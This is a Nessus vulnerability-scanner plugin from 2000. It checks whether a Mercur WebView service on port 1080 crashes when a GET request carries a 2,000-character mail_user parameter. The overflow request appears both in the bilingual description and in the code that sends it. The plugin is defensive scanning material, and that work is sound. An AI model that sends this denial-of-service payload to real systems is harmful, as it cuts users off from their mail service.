home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / mercure_webview.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  110 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10346);
  10.  script_bugtraq_id(1056);
  11.  script_version ("$Revision: 1.12 $");
  12.  script_cve_id("CAN-2000-0239");
  13.  name["english"] = "Mercur WebView WebClient";
  14.  name["francais"] = "Mercur WebView WebClient";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "
  18. The remote WebView service does not do proper bound
  19. checking when it handles the GET request,
  20. and thus is subject to a buffer overflow
  21. which results in a Denial of Service.
  22.  
  23. The request that could lead to a buffer
  24. overflow is :
  25.  
  26.     GET /mmain.html&mail_user=aaa[...]aaa
  27.  
  28. An attacker may use this problem to
  29. prevent your users from checking their
  30. mails.
  31.  
  32.  
  33. Solution : contact the vendor for a patch
  34. Risk factor : High";
  35.  
  36.  
  37.  desc["francais"] = "
  38. Le service WebView distant ne vΘrifie pas
  39. correctement la longueur des arguments qu'il
  40. recoit lorsqu'il traite la commande GET
  41. et est par consΘquent sujet α un dΘpassement
  42. de buffer qui permet de mener α un DΘni
  43. de Service.
  44.  
  45. La requete qui a permi de mener α un
  46. dΘni de service est :
  47.  
  48.     GET /mmain.html&mail_user=aaa[...]aaa
  49.     
  50. Un pirate peut utiliser ce problΦme pour 
  51. empecher les utilisateurs de relever leur mail.
  52.  
  53. Solution : contactez votre vendeur pour un patch
  54. Facteur de risque : SΘrieux";
  55.  
  56.  
  57.  script_description(english:desc["english"], francais:desc["francais"]);
  58.  
  59.  summary["english"] = "Checks for a buffer overflow";
  60.  summary["francais"] = "VΘrifie la prΘsence d'un dΘpassement de buffer";
  61.  
  62.  script_summary(english:summary["english"], francais:summary["francais"]);
  63.  
  64.  script_category(ACT_DENIAL);
  65.  
  66.  
  67.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  68.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  69.  family["english"] = "Denial of Service";
  70.  family["francais"] = "DΘni de service";
  71.  script_family(english:family["english"], francais:family["francais"]);
  72.  script_dependencie("find_service.nes", "httpver.nasl");
  73.  script_require_ports(1080);
  74.  exit(0);
  75. }
  76.  
  77. #
  78. # The script code starts here
  79. #
  80.  
  81. include("http_func.inc");
  82.  
  83. port = 1080;
  84.  
  85. if(get_port_state(port))
  86. {
  87.  soc = http_open_socket(port);
  88.  if(soc)
  89.  {
  90.   # check it's a web-server first
  91.   req = http_get(item:"/", port:port);
  92.   send(socket:soc, data:req);
  93.   r = http_recv(socket:soc);
  94.   http_close_socket(soc);
  95.   if(!r)exit(0);
  96.   if(!("HTTP" >< r))exit(0);
  97.   
  98.   soc2 = http_open_socket(port);
  99.   if(soc2)
  100.   {
  101.    req2 = string("/mmain.html&mail_user=", crap(2000));
  102.    req2 = http_get(item:req2, port:port);
  103.    send(socket:soc2, data:req2);
  104.    r2 = http_recv(socket:soc2);
  105.    http_close_socket(soc2);
  106.    if(!r2)security_hole(port);
  107.   }
  108.  }
  109. }
  110.